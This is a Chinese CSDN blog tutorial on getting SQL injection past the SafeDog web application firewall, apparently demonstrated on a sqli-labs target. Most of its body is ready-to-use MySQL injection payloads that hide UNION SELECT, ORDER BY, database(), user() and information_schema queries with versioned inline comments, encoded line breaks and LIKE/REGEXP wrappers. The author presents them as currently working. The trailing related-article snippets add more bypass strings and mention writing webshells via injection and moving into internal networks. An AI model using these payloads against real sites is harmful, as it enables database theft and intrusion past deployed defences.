SQL注入绕过安全狗

最新推荐文章于 2024-09-04 21:47:25 发布
最新推荐文章于 2024-09-04 21:47:25 发布
阅读量1.3k 收藏 2
点赞数 1
文章标签: 安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45462249/article/details/125798934
版权
本文介绍了如何绕过网站安全狗的防护进行SQL注入攻击,包括内联注释绕过、模糊查询绕过等方法,并展示了如何查询数据库用户名和表信息。通过示例演示了各种绕过技巧,如使用LIKE和REGEXP进行模糊查询,以及结合UNION和SELECT查询敏感信息。
摘要由CSDN通过智能技术生成

SQL注入绕过安全狗

前期知识

网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。

黑名单

WAF禁止了一些有关攻击语句的函数,用户一旦输入这些函数,就会被WAF拦截

演示开始

首先发现有注入,大多数人都是老方法(and 1=1)嘛,但是看效果
在这里插入图片描述
由于安全狗的防护,检测到了and函数,所以开始绕

内联注释绕过

内联注释绕过在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行,当!后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。(但也不绝对,还得自己用burp跑一下确定版本号)
在这里插入图片描述

模糊查询绕过

LIKE//REGEXP 方法
在这里插入图片描述
在这里插入图片描述
相当于select * from student where snO=1 like "[%23]"为空
也就是说,就执行了select * from student;
所以
id=-1’ like “[%23]” /!10440union%0aselect/ 1,2,3 --+
在这里插入图片描述

1' REGEXP "[…%0a%23]" /*!11444 order %0a by*/ 1 --+  
1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+
也是可以的,REGEXP用法跟LIKE差不多,也是模糊查询

union /*//*//*!50344select*/1,2,3 --+

查询数据库用户名和表信息

查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来
查询库

union /*//*//*!50344select*/1,2,database(/*!50644*/) --+

查询用户名

-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +

查询表名

  ?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.tables*/  where table_schema='security'--+

等等

暂时是都可以绕过的,如果不行,可以试试FUZZ大法

成长中的小菜菜
关注
sql注入安全狗 冰蝎加密
代码审计
05-17 860
内联注释过安全狗 http://www.sqli.com/Less-1/?id=-1%27union/*/$-----*/select%201,user/*/$-----*/(),3%20--%201 核心就是绕过information_schema.schemata,这里采用的方式是–+/*0ainformation_schema.tables,–代表将本行的sql语句注释掉了,+号充当空格,%0a表示闭合换行 /−−−−−∗/填充垃圾字符设置fuzz参数点/−@-----*/ 填充垃圾字符 设置fu
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5582
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细_mysql注入绕waf
最新发布
heike_Ch的博客
09-04 956
WAF(Web应用防火墙)作为一种专为Web应用程序设计的安全防护工具,其核心功能在于通过实施一系列针对HTTP/HTTPS协议的安全策略,来增强Web应用的安全性。WAF内置了精心设计的检测逻辑与规则集,这些规则旨在对每一个进入系统的请求内容进行细致审查,并对任何违反安全策略的请求采取即时且有效的防御措施,从而维护Web应用环境的纯净与安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5110
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
安全狗SQL注入绕过
qq_38675102的博客
02-09 2740
安全狗waf绕过
sql注入绕过安全狗
weixin_48776804的博客
02-15 691
sql注入安全狗
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
安全狗3.5版本SQL注入绕过
恢弘志士的博客
07-19 463
环境搭建: phpstudy+sqli-labs-master 安全狗版本: 出现问题:新版安全狗Apache服务无法启动问题 管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下 执行命令:httpd -k install -n apache2.4 环境搭建完毕,验证安全狗正常拦截开搞开搞!!! 从上面验证看来就是针对union 和select的组合进行拦截 按照B站小迪师傅搞了半天不行,想想应该是.
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
这些技术用于绕过安全狗的检测并执行恶意查询,从而可能暴露敏感数据、破坏数据或完全控制数据库系统。对于防御SQL注入,应确保对用户输入进行充分的验证和转义,使用参数化查询,或者采用预编译的SQL语句,同时保持...
实战sql注入绕过安全狗
weixin_45901902的博客
08-19 616
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ 不拦截 and hex(1) 不拦截 %23%0a 1=1 拦截 绕过order by 发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截 安全狗他拦截哪里我们就绕哪里 order%23%0aby 1 不拦截 order /!by/ 1拦截 .
记一次艰难的SQL注入(过安全狗)
热门推荐
realmels的博客
02-01 1万+
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录前文链接1.1 前言2.1 注入测试2.1.1 绕过第一式:汉字双字节编码绕过单引号3.1 获取数据库3.1.1 绕过第二式:注释3.1.2 绕过第三式:内联注释绕过空格4.1 获取表名4.1.1 绕过第四式:select过安全狗5.1 获取列名5.1.1 绕过第五式:骚操作绕过魔术函数6.1 爆帐密总结 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发.
sql注入安全狗(官网绕waf)【原创】
weixin_30237281的博客
03-26 471
作者:风之传说 给大家来个全新的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
【Python脚本】SQLMap的Tamper脚本——绕过安全狗
weixin_55205599的博客
10-18 647
针对WAF编写Tamper脚本进行绕过安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截。
SQL注入之打狗棒法(安全狗绕过
快吃小蛋糕吧的博客
10-28 1347
最近在网上挖洞时,总会遇到烦人的安全狗,研究了一天发现绕过安全狗出奇的简单,只需要语法犀利即可。 前言: 相信在网络上做渗透测试时,总会遇到如下情况: 这是网站管理员在服务器上安装了安全狗安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带.
SQL注入绕过安全狗的五种方法
01-11 1408
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
SQL注入安全狗直接getshell
qq_42042353的博客
09-26 452
实验环境 1、phpstudy搭建的SQLi-Labs(MySQL) 2、安全狗4.0 成功所需要的条件 1、准备一个可以过狗过杀软的一句话 2、网站目录的绝对路径 直接进入正题 普通的注入攻击直接被安全狗拦截 比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/” (这里获取网站绝对路径有很多方式,不一一说明) 这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY” 它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL
绕过SQL注入安全狗4.0的实战挑战
3. **SQL注入绕过策略**: 文档的重点可能在于如何利用SQL注入技术来避开这种验证机制。例如,攻击者可能会尝试使用SQL注解,如`' OR 1=1; --`,将条件变成永远为真的表达式,使得空密码也能通过验证。另一种方法可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值